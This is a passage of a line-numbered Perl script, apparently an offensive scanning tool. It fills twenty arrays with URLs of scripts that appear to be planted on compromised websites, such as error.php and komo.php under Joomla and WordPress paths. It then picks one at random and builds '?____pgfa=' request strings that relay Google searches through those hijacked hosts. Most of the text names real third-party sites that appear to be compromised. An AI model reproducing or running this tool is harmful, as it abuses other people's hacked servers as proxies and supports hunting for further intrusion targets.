systems.com/plugins/content/config.inc.php","http://fonio.hu/ajiu/bp.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://inter-projekt.waw.pl/images/stories/error//error.php","http://www.mlmia.com//images/stories/search.php","http://www.bam.co.th/bam/corporate/xmlrpc/index2.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://ronde-en-couleurs.com/wp-includes/error.php","http://www.allsocool.com.au/php/error.php");
  86.  
  87. my @randombarner11 = ("http://www.wtpolytech.com/th/includes/config.index.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.harmonywaters.us/administrator/components/com_maian15/charts/tmp-upload-images/komo/komo.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://viewwebinars.com/wp-includes/errors.php","http://www.druhupalem.cz/images/stories/errors.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://inter-projekt.waw.pl/images/stories/error//error.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://s195003287.online.de/Platz/administrator/templates/index2.php","http://www.voileenligne.com/audio/komo.php","http://glowform.com/wp-content/uploads/config.inc.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://www.mdcsystems.com/plugins/content/config.inc.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.wtpolytech.com/th/includes/config.index.php","http://www.allsocool.com.au/php/error.php","http://www.sibtruckservice.ru/images/errors.php","http://unhas.ac.id/farmasi/lama/images/stories/errors.php","http://motoarena.ru/images/stories/errors.php","http://www.mlmia.com//images/stories/search.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://kavkazinterpress.ru/plugins/content/config.inc.php","http://www.planville.com.br/plugins/search/config.index.php","http://www.dom-sad-ogorod.ru/plugins/search/config.inc.php","http://apritalia.it/css/config.inc.php","http://europump.com.pl/images/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://hd.schoevers.com//logs/seka.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.accidentresolution.com/blogspot/images/stories/error/error.php","http://cmssa.com.br//php/error.php","http://www.corpetrol.edu.co/corpetrol//images/stories/error.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://www.schirrhein.fr/error.php","http://mbuz-bcrb.ru/includes/js/calendar/lang/error.php","http://www.an-tc.ru/images/stories/errors.php","http://viewwebinars.com/wp-includes/errors.php","http://www.mdcsystems.com/plugins/content/config.inc.php","http://fonio.hu/ajiu/bp.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://www.lesyro.cz//images/stories/errors.php","http://www.mlmia.com//images/stories/search.php","http://www.bam.co.th/bam/corporate/xmlrpc/index2.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://ronde-en-couleurs.com/wp-includes/error.php","http://iidh-jurisprudencia.ac.cr/bibliote/images/stories/error.php");
  88.  
  89. my @randombarner12 = ("http://s195003287.online.de/Platz/administrator/templates/index2.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.harmonywaters.us/administrator/components/com_maian15/charts/tmp-upload-images/komo/komo.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://viewwebinars.com/wp-includes/errors.php","http://www.druhupalem.cz/images/stories/errors.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://inter-projekt.waw.pl/images/stories/error//error.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://ronde-en-couleurs.com/wp-includes/error.php","http://www.voileenligne.com/audio/komo.php","http://www.lesyro.cz//images/stories/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://viewwebinars.com/wp-includes/errors.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.remedyhospital.com.tr/eng//images/stories/errors.php","http://www.organum.fr/images/errors.php","http://www.sibtruckservice.ru/images/errors.php","http://unhas.ac.id/farmasi/lama/images/stories/errors.php","http://www.mdcsystems.com/plugins/content/config.inc.php","http://www.mlmia.com//images/stories/search.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://kavkazinterpress.ru/plugins/content/config.inc.php","http://www.planville.com.br/plugins/search/config.index.php","http://www.dom-sad-ogorod.ru/plugins/search/config.inc.php","http://apritalia.it/css/config.inc.php","http://europump.com.pl/images/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://hd.schoevers.com//logs/seka.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.accidentresolution.com/blogspot/images/stories/error/error.php","http://cmssa.com.br//php/error.php","http://liftoffconsulting.ca/wp-includes/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://viewwebinars.com/wp-includes/errors.php","http://mbuz-bcrb.ru/includes/js/calendar/lang/error.php","http://www.an-tc.ru/images/stories/errors.php","http://viewwebinars.com/wp-includes/errors.php","http://www.mdcsystems.com/plugins/content/config.inc.php","http://fonio.hu/ajiu/bp.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://inter-projekt.waw.pl/images/stories/error//error.php","http://www.mlmia.com//images/stories/search.php","http://www.bam.co.th/bam/corporate/xmlrpc/index2.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://ronde-en-couleurs.com/wp-includes/error.php","http://www.mdcsystems.com/plugins/content/config.inc.php");
  90.  
  91. my @randombarner13 = ("http://www.muliaperkasaabadi.com/images/stories/errors.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.harmonywaters.us/administrator/components/com_maian15/charts/tmp-upload-images/komo/komo.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://viewwebinars.com/wp-includes/errors.php","http://www.druhupalem.cz/images/stories/errors.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://inter-projekt.waw.pl/images/stories/error//error.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://ronde-en-couleurs.com/wp-includes/error.php","http://www.voileenligne.com/audio/komo.php","http://209.188.87.82/error.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://www.corpetrol.edu.co/corpetrol//images/stories/error.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.auptitnidlorrain.fr/images/errors.php","http://www.organum.fr/images/errors.php","http://www.sibtruckservice.ru/images/errors.php","http://unhas.ac.id/farmasi/lama/images/stories/errors.php","http://motoarena.ru/images/stories/errors.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://kavkazinterpress.ru/plugins/content/config.inc.php","http://www.planville.com.br/plugins/search/config.index.php","http://www.dom-sad-ogorod.ru/plugins/search/config.inc.php","http://apritalia.it/css/config.inc.php","http://europump.com.pl/images/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://hd.schoevers.com//logs/seka.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.allsocool.com.au/php/error.php","http://www.wtpolytech.com/th/includes/config.index.php","http://liftoffconsulting.ca/wp-includes/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://www.corpetrol.edu.co/corpetrol//images/stories/error.php","http://mbuz-bcrb.ru/includes/js/calendar/lang/error.php","http://www.an-tc.ru/images/stories/errors.php","http://viewwebinars.com/wp-includes/errors.php","http://www.mdcsystems.com/plugins/content/config.inc.php","http://fonio.hu/ajiu/bp.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://glowform.com/wp-content/uploads/config.inc.php","http://www.mlmia.com//images/stories/search.php","http://www.bam.co.th/bam/corporate/xmlrpc/index2.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.wtpolytech.com/th/includes/config.index.php","http://www.allsocool.com.au/php/error.php","http://www.remedyhospital.com.tr/eng//images/stories/errors.php");
  92.  
  93. my @randombarner14 = ("http://www.muliaperkasaabadi.com/images/stories/errors.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.harmonywaters.us/administrator/components/com_maian15/charts/tmp-upload-images/komo/komo.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://viewwebinars.com/wp-includes/errors.php","http://www.druhupalem.cz/images/stories/errors.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://inter-projekt.waw.pl/images/stories/error//error.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://ronde-en-couleurs.com/wp-includes/error.php","http://www.voileenligne.com/audio/komo.php","http://209.188.87.82/error.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://www.corpetrol.edu.co/corpetrol//images/stories/error.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.auptitnidlorrain.fr/images/errors.php","http://www.organum.fr/images/errors.php","http://www.sibtruckservice.ru/images/errors.php","http://unhas.ac.id/farmasi/lama/images/stories/errors.php","http://motoarena.ru/images/stories/errors.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://kavkazinterpress.ru/plugins/content/config.inc.php","http://www.planville.com.br/plugins/search/config.index.php","http://www.dom-sad-ogorod.ru/plugins/search/config.inc.php","http://apritalia.it/css/config.inc.php","http://europump.com.pl/images/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://hd.schoevers.com//logs/seka.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.allsocool.com.au/php/error.php","http://www.wtpolytech.com/th/includes/config.index.php","http://liftoffconsulting.ca/wp-includes/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://www.corpetrol.edu.co/corpetrol//images/stories/error.php","http://mbuz-bcrb.ru/includes/js/calendar/lang/error.php","http://www.an-tc.ru/images/stories/errors.php","http://viewwebinars.com/wp-includes/errors.php","http://www.mdcsystems.com/plugins/content/config.inc.php","http://fonio.hu/ajiu/bp.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://glowform.com/wp-content/uploads/config.inc.php","http://www.mlmia.com//images/stories/search.php","http://www.bam.co.th/bam/corporate/xmlrpc/index2.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.wtpolytech.com/th/includes/config.index.php","http://www.allsocool.com.au/php/error.php","http://www.remedyhospital.com.tr/eng//images/stories/errors.php");
  94.  
  95. my @randombarner15 = ("http://www.muliaperkasaabadi.com/images/stories/errors.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.harmonywaters.us/administrator/components/com_maian15/charts/tmp-upload-images/komo/komo.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://viewwebinars.com/wp-includes/errors.php","http://www.druhupalem.cz/images/stories/errors.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://inter-projekt.waw.pl/images/stories/error//error.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://ronde-en-couleurs.com/wp-includes/error.php","http://www.voileenligne.com/audio/komo.php","http://209.188.87.82/error.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://www.corpetrol.edu.co/corpetrol//images/stories/error.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.auptitnidlorrain.fr/images/errors.php","http://www.organum.fr/images/errors.php","http://www.sibtruckservice.ru/images/errors.php","http://unhas.ac.id/farmasi/lama/images/stories/errors.php","http://motoarena.ru/images/stories/errors.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://kavkazinterpress.ru/plugins/content/config.inc.php","http://www.planville.com.br/plugins/search/config.index.php","http://www.dom-sad-ogorod.ru/plugins/search/config.inc.php","http://apritalia.it/css/config.inc.php","http://europump.com.pl/images/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://hd.schoevers.com//logs/seka.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.allsocool.com.au/php/error.php","http://www.wtpolytech.com/th/includes/config.index.php","http://liftoffconsulting.ca/wp-includes/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://www.corpetrol.edu.co/corpetrol//images/stories/error.php","http://mbuz-bcrb.ru/includes/js/calendar/lang/error.php","http://www.an-tc.ru/images/stories/errors.php","http://viewwebinars.com/wp-includes/errors.php","http://www.mdcsystems.com/plugins/content/config.inc.php","http://fonio.hu/ajiu/bp.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://glowform.com/wp-content/uploads/config.inc.php","http://www.mlmia.com//images/stories/search.php","http://www.bam.co.th/bam/corporate/xmlrpc/index2.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.wtpolytech.com/th/includes/config.index.php","http://www.allsocool.com.au/php/error.php","http://www.remedyhospital.com.tr/eng//images/stories/errors.php");
  96.  
  97. my @randombarner16 = ("http://www.muliaperkasaabadi.com/images/stories/errors.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.harmonywaters.us/administrator/components/com_maian15/charts/tmp-upload-images/komo/komo.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://viewwebinars.com/wp-includes/errors.php","http://www.druhupalem.cz/images/stories/errors.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://inter-projekt.waw.pl/images/stories/error//error.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://ronde-en-couleurs.com/wp-includes/error.php","http://www.voileenligne.com/audio/komo.php","http://209.188.87.82/error.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://www.corpetrol.edu.co/corpetrol//images/stories/error.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.auptitnidlorrain.fr/images/errors.php","http://www.organum.fr/images/errors.php","http://www.sibtruckservice.ru/images/errors.php","http://unhas.ac.id/farmasi/lama/images/stories/errors.php","http://motoarena.ru/images/stories/errors.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://kavkazinterpress.ru/plugins/content/config.inc.php","http://www.planville.com.br/plugins/search/config.index.php","http://www.dom-sad-ogorod.ru/plugins/search/config.inc.php","http://apritalia.it/css/config.inc.php","http://europump.com.pl/images/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://hd.schoevers.com//logs/seka.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.allsocool.com.au/php/error.php","http://www.wtpolytech.com/th/includes/config.index.php","http://liftoffconsulting.ca/wp-includes/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://www.corpetrol.edu.co/corpetrol//images/stories/error.php","http://mbuz-bcrb.ru/includes/js/calendar/lang/error.php","http://www.an-tc.ru/images/stories/errors.php","http://viewwebinars.com/wp-includes/errors.php","http://www.mdcsystems.com/plugins/content/config.inc.php","http://fonio.hu/ajiu/bp.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://glowform.com/wp-content/uploads/config.inc.php","http://www.mlmia.com//images/stories/search.php","http://www.bam.co.th/bam/corporate/xmlrpc/index2.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.wtpolytech.com/th/includes/config.index.php","http://www.allsocool.com.au/php/error.php","http://www.remedyhospital.com.tr/eng//images/stories/errors.php");
  98.  
  99. my @randombarner17 = ("http://www.muliaperkasaabadi.com/images/stories/errors.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.harmonywaters.us/administrator/components/com_maian15/charts/tmp-upload-images/komo/komo.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://viewwebinars.com/wp-includes/errors.php","http://www.druhupalem.cz/images/stories/errors.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://inter-projekt.waw.pl/images/stories/error//error.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://ronde-en-couleurs.com/wp-includes/error.php","http://www.voileenligne.com/audio/komo.php","http://209.188.87.82/error.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://www.corpetrol.edu.co/corpetrol//images/stories/error.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.auptitnidlorrain.fr/images/errors.php","http://www.organum.fr/images/errors.php","http://www.sibtruckservice.ru/images/errors.php","http://unhas.ac.id/farmasi/lama/images/stories/errors.php","http://motoarena.ru/images/stories/errors.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://kavkazinterpress.ru/plugins/content/config.inc.php","http://www.planville.com.br/plugins/search/config.index.php","http://www.dom-sad-ogorod.ru/plugins/search/config.inc.php","http://apritalia.it/css/config.inc.php","http://europump.com.pl/images/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://hd.schoevers.com//logs/seka.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.allsocool.com.au/php/error.php","http://www.wtpolytech.com/th/includes/config.index.php","http://liftoffconsulting.ca/wp-includes/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://www.corpetrol.edu.co/corpetrol//images/stories/error.php","http://mbuz-bcrb.ru/includes/js/calendar/lang/error.php","http://www.an-tc.ru/images/stories/errors.php","http://viewwebinars.com/wp-includes/errors.php","http://www.mdcsystems.com/plugins/content/config.inc.php","http://fonio.hu/ajiu/bp.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://glowform.com/wp-content/uploads/config.inc.php","http://www.mlmia.com//images/stories/search.php","http://www.bam.co.th/bam/corporate/xmlrpc/index2.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.wtpolytech.com/th/includes/config.index.php","http://www.allsocool.com.au/php/error.php","http://www.remedyhospital.com.tr/eng//images/stories/errors.php");
  100.  
  101. my @randombarner18 = ("http://www.muliaperkasaabadi.com/images/stories/errors.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.harmonywaters.us/administrator/components/com_maian15/charts/tmp-upload-images/komo/komo.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://viewwebinars.com/wp-includes/errors.php","http://www.druhupalem.cz/images/stories/errors.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://inter-projekt.waw.pl/images/stories/error//error.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://ronde-en-couleurs.com/wp-includes/error.php","http://www.voileenligne.com/audio/komo.php","http://209.188.87.82/error.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://www.corpetrol.edu.co/corpetrol//images/stories/error.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.auptitnidlorrain.fr/images/errors.php","http://www.organum.fr/images/errors.php","http://www.sibtruckservice.ru/images/errors.php","http://unhas.ac.id/farmasi/lama/images/stories/errors.php","http://motoarena.ru/images/stories/errors.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://kavkazinterpress.ru/plugins/content/config.inc.php","http://www.planville.com.br/plugins/search/config.index.php","http://www.dom-sad-ogorod.ru/plugins/search/config.inc.php","http://apritalia.it/css/config.inc.php","http://europump.com.pl/images/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://hd.schoevers.com//logs/seka.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.allsocool.com.au/php/error.php","http://www.wtpolytech.com/th/includes/config.index.php","http://liftoffconsulting.ca/wp-includes/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://www.corpetrol.edu.co/corpetrol//images/stories/error.php","http://mbuz-bcrb.ru/includes/js/calendar/lang/error.php","http://www.an-tc.ru/images/stories/errors.php","http://viewwebinars.com/wp-includes/errors.php","http://www.mdcsystems.com/plugins/content/config.inc.php","http://fonio.hu/ajiu/bp.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://glowform.com/wp-content/uploads/config.inc.php","http://www.mlmia.com//images/stories/search.php","http://www.bam.co.th/bam/corporate/xmlrpc/index2.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.wtpolytech.com/th/includes/config.index.php","http://www.allsocool.com.au/php/error.php","http://www.remedyhospital.com.tr/eng//images/stories/errors.php");
  102.  
  103. my @randombarner19 = ("http://www.muliaperkasaabadi.com/images/stories/errors.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.harmonywaters.us/administrator/components/com_maian15/charts/tmp-upload-images/komo/komo.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://viewwebinars.com/wp-includes/errors.php","http://www.druhupalem.cz/images/stories/errors.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://inter-projekt.waw.pl/images/stories/error//error.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://ronde-en-couleurs.com/wp-includes/error.php","http://www.voileenligne.com/audio/komo.php","http://209.188.87.82/error.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://www.corpetrol.edu.co/corpetrol//images/stories/error.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.auptitnidlorrain.fr/images/errors.php","http://www.organum.fr/images/errors.php","http://www.sibtruckservice.ru/images/errors.php","http://unhas.ac.id/farmasi/lama/images/stories/errors.php","http://motoarena.ru/images/stories/errors.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://kavkazinterpress.ru/plugins/content/config.inc.php","http://www.planville.com.br/plugins/search/config.index.php","http://www.dom-sad-ogorod.ru/plugins/search/config.inc.php","http://apritalia.it/css/config.inc.php","http://europump.com.pl/images/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://hd.schoevers.com//logs/seka.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.allsocool.com.au/php/error.php","http://www.wtpolytech.com/th/includes/config.index.php","http://liftoffconsulting.ca/wp-includes/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://www.corpetrol.edu.co/corpetrol//images/stories/error.php","http://mbuz-bcrb.ru/includes/js/calendar/lang/error.php","http://www.an-tc.ru/images/stories/errors.php","http://viewwebinars.com/wp-includes/errors.php","http://www.mdcsystems.com/plugins/content/config.inc.php","http://fonio.hu/ajiu/bp.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://glowform.com/wp-content/uploads/config.inc.php","http://www.mlmia.com//images/stories/search.php","http://www.bam.co.th/bam/corporate/xmlrpc/index2.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.wtpolytech.com/th/includes/config.index.php","http://www.allsocool.com.au/php/error.php","http://www.remedyhospital.com.tr/eng//images/stories/errors.php");
  104.  
  105. my @randombarner20 = ("http://www.muliaperkasaabadi.com/images/stories/errors.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.harmonywaters.us/administrator/components/com_maian15/charts/tmp-upload-images/komo/komo.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://viewwebinars.com/wp-includes/errors.php","http://www.druhupalem.cz/images/stories/errors.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://inter-projekt.waw.pl/images/stories/error//error.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://ronde-en-couleurs.com/wp-includes/error.php","http://www.voileenligne.com/audio/komo.php","http://209.188.87.82/error.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://www.corpetrol.edu.co/corpetrol//images/stories/error.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.auptitnidlorrain.fr/images/errors.php","http://www.organum.fr/images/errors.php","http://www.sibtruckservice.ru/images/errors.php","http://unhas.ac.id/farmasi/lama/images/stories/errors.php","http://motoarena.ru/images/stories/errors.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://kavkazinterpress.ru/plugins/content/config.inc.php","http://www.planville.com.br/plugins/search/config.index.php","http://www.dom-sad-ogorod.ru/plugins/search/config.inc.php","http://apritalia.it/css/config.inc.php","http://europump.com.pl/images/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://hd.schoevers.com//logs/seka.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.allsocool.com.au/php/error.php","http://www.wtpolytech.com/th/includes/config.index.php","http://liftoffconsulting.ca/wp-includes/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://www.corpetrol.edu.co/corpetrol//images/stories/error.php","http://mbuz-bcrb.ru/includes/js/calendar/lang/error.php","http://www.an-tc.ru/images/stories/errors.php","http://viewwebinars.com/wp-includes/errors.php","http://www.mdcsystems.com/plugins/content/config.inc.php","http://fonio.hu/ajiu/bp.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://glowform.com/wp-content/uploads/config.inc.php","http://www.mlmia.com//images/stories/search.php","http://www.bam.co.th/bam/corporate/xmlrpc/index2.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.wtpolytech.com/th/includes/config.index.php","http://www.allsocool.com.au/php/error.php","http://www.remedyhospital.com.tr/eng//images/stories/errors.php");
  106.  
  107.  
  108.  
  109. my $fullmagic1 = $randombarner1[rand(scalar(@randombarner1))];
  110. my $fullmagic2 = $randombarner2[rand(scalar(@randombarner2))];
  111. my $fullmagic3 = $randombarner3[rand(scalar(@randombarner3))];
  112. my $fullmagic4 = $randombarner4[rand(scalar(@randombarner4))];
  113. my $fullmagic5 = $randombarner5[rand(scalar(@randombarner5))];
  114. my $fullmagic6 = $randombarner6[rand(scalar(@randombarner6))];
  115. my $fullmagic7 = $randombarner7[rand(scalar(@randombarner7))];
  116. my $fullmagic8 = $randombarner8[rand(scalar(@randombarner8))];
  117. my $fullmagic9 = $randombarner9[rand(scalar(@randombarner9))];
  118. my $fullmagic10 = $randombarner10[rand(scalar(@randombarner10))];
  119. my $fullmagic11 = $randombarner11[rand(scalar(@randombarner11))];
  120. my $fullmagic12 = $randombarner12[rand(scalar(@randombarner12))];
  121. my $fullmagic13 = $randombarner13[rand(scalar(@randombarner13))];
  122. my $fullmagic14 = $randombarner14[rand(scalar(@randombarner14))];
  123. my $fullmagic15 = $randombarner15[rand(scalar(@randombarner15))];
  124. my $fullmagic16 = $randombarner16[rand(scalar(@randombarner16))];
  125. my $fullmagic17 = $randombarner17[rand(scalar(@randombarner17))];
  126. my $fullmagic18 = $randombarner18[rand(scalar(@randombarner18))];
  127. my $fullmagic19 = $randombarner19[rand(scalar(@randombarner19))];
  128. my $fullmagic20 = $randombarner20[rand(scalar(@randombarner20))];
  129.  
  130.  
  131. my $jack1 = "".$fullmagic1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  132. my $jack2 = "".$fullmagic2."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
